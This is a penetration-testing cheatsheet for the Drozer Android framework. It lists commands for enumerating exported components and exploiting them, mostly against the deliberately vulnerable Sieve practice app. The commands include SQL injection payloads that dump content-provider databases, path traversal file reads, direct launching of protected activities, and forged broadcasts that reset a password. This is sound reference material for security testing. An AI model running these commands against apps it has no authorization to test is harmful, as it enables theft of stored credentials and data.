Skip to content

Drozer cheatsheet

Setup drozer

Android Penetration Tools Walkthrough Series: Drozer - Infosec Resources (infosecinstitute.com)

Get drozer shell

`adb forward tcp:31415 tcp:31415`
`drozer console connect`

Content Providers

  • Get info from exposed content providers run app.provider.info -a com.mwr.example.sieve

Note: content provider queries take the form content://name.of.package.class/declared_name

  • Drozer can guess and try several URIs run scanner.provider.finduris -a com.mwr.example.sieve
  • Query Content Provider (database based) run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Keys/ --vertical
  • Update and delete content provider (database based) Exploiting Content Providers - HackTricks
  • Manual SQL Injection test run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
  • Manual SQL Lite Dump run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
  • Automatic SQL Discovery run scanner.provider.injection -a com.mwr.example.sieve
  • Read Files run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts

  • Automatic Path Traversal Discovery run scanner.provider.traversal -a com.mwr.example.sieve

Permissions

  • Examine Permissions and custom permissions run app.package.info -a com.spotify.music

  • pull invocable URIs(deep links/app links) from the AndroidManifest.xml file 

    run scanner.activity.browsable -a com.google.android.apps.messaging
Package: com.google.android.apps.messaging
  Invocable URIs:
    sms://
    mms://
  Classes:
    com.google.android.apps.messaging.ui.conversation.LaunchConversationActivity

  • Call deeplinks run app.activity.start --action android.intent.action.VIEW --data-uri "sms://0123456789"

Exported IPC components

  • Enumerate exported run app.package.attacksurface com.mwr.example.sieve
  • List exported content providers run app.provider.finduri com.mwr.example.sieve
  • List exported Activities run app.activity.info -a com.mwr.example.sieve
  • Launch Activity directly run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
  • List exported services run app.service.info -a com.mwr.example.sieve
  • Interact with service run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 6345 7452 1 --extra string com.mwr.example.sieve.PASSWORD "abcdabcdabcdabcd" --bundle-as-obj
  • List broadcast recivers run app.broadcast.info -a com.android.insecurebankv2
  • Send message to broadcast reciever run app.broadcast.send --action theBroadcast --extra string phonenumber 07123456789 --extra string newpass 12345
  • Sniff intents run app.broadcast.sniff --action theBroadcast

Scan for all debuggable applications on a device

run app.package.debuggable